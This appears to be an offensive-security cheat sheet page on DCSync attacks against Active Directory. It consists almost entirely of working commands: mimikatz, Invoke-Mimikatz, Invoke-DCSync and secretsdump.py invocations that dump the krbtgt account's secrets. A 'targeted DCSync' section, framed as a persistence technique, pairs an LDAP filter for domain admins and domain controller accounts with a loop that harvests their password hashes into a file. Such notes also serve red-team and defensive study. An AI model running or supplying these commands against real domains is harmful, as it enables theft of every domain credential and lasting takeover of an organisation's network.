DCSync
DS-Replication-Get-Changes + DS-Replication-Get-Changes-All

Tools

Mimikatz

mimikatz # lsadump::dcsync /domain:megacorp.local /user:MEGACORP\krbtgt
mimikatz # lsadump::dcsync /domain:megacorp.local /user:[email protected]

Invoke-Mimikatz

PS > Invoke-Mimikatz -Command '"lsadump::dcsync /domain:megacorp.local /user:MEGACORP\krbtgt" "exit"'

Invoke-DCSync.ps1

PS > Invoke-DCSync -GetComputers -Domain megacorp.local -DomainController DC1.megacorp.local

secretsdump.py

$ secretsdump.py MEGACORP/snovvcrash:'Passw0rd!'@DC1.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt'
$ secretsdump.py DC1.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass

Targeted DCSync

When performing targeted DCSync (e.g., for persistence purposes) choose the most valuable accounts. One can use the following LDAP query to search for effective domain admins (adminCount=1) as well as DC computer accounts (SERVER_TRUST_ACCOUNT bit or userAccountControl=8192 is set):
(&
(|
(&(objectCategory=person)(objectClass=user))
(&(objectCategory=computer)(objectClass=computer))
)
(!(userAccountControl:1.2.840.113556.1.4.803:=2))
(|
(adminCount=1)
(userAccountControl:1.2.840.113556.1.4.803:=8192)
)
)
$ windapsearch --dc 192.168.1.11 -d megacorp.local -u 'DC1#x27; --hash fc525c9683e8fe067095ba2ddc971889 -m custom --filter '(&(|(&(objectCategory=person)(objectClass=user))(&(objectCategory=computer)(objectClass=computer)))(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(adminCount=1)(userAccountControl:1.2.840.113556.1.4.803:=8192)))' --attrs msDS-PrincipalName | grep msDS | awk '{print $2}' | tee high-value-targets.txt
$ for t in `cat high-value-targets.txt`; do secretsdump.py -pwd-last-set MEGACORP/'DC1#x27;@192.168.2.22 -hashes :fc525c9683e8fe067095ba2ddc971889 -just-dc-user $t | grep aad3b | tee -a high-value-hashes.txt; done
Or
$ secretsdump.py -pwd-last-set MEGACORP/snovvcrash:'Passw0rd!'@DC1.megacorp.local -dc-ip 192.168.1.11 -ldapfilter '(&(|(&(objectCategory=person)(objectClass=user))(&(objectCategory=computer)(objectClass=computer)))(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(adminCount=1)(userAccountControl:1.2.840.113556.1.4.803:=8192)))' | grep aad3b | tee high-value-hashes.txt
Last modified 1mo ago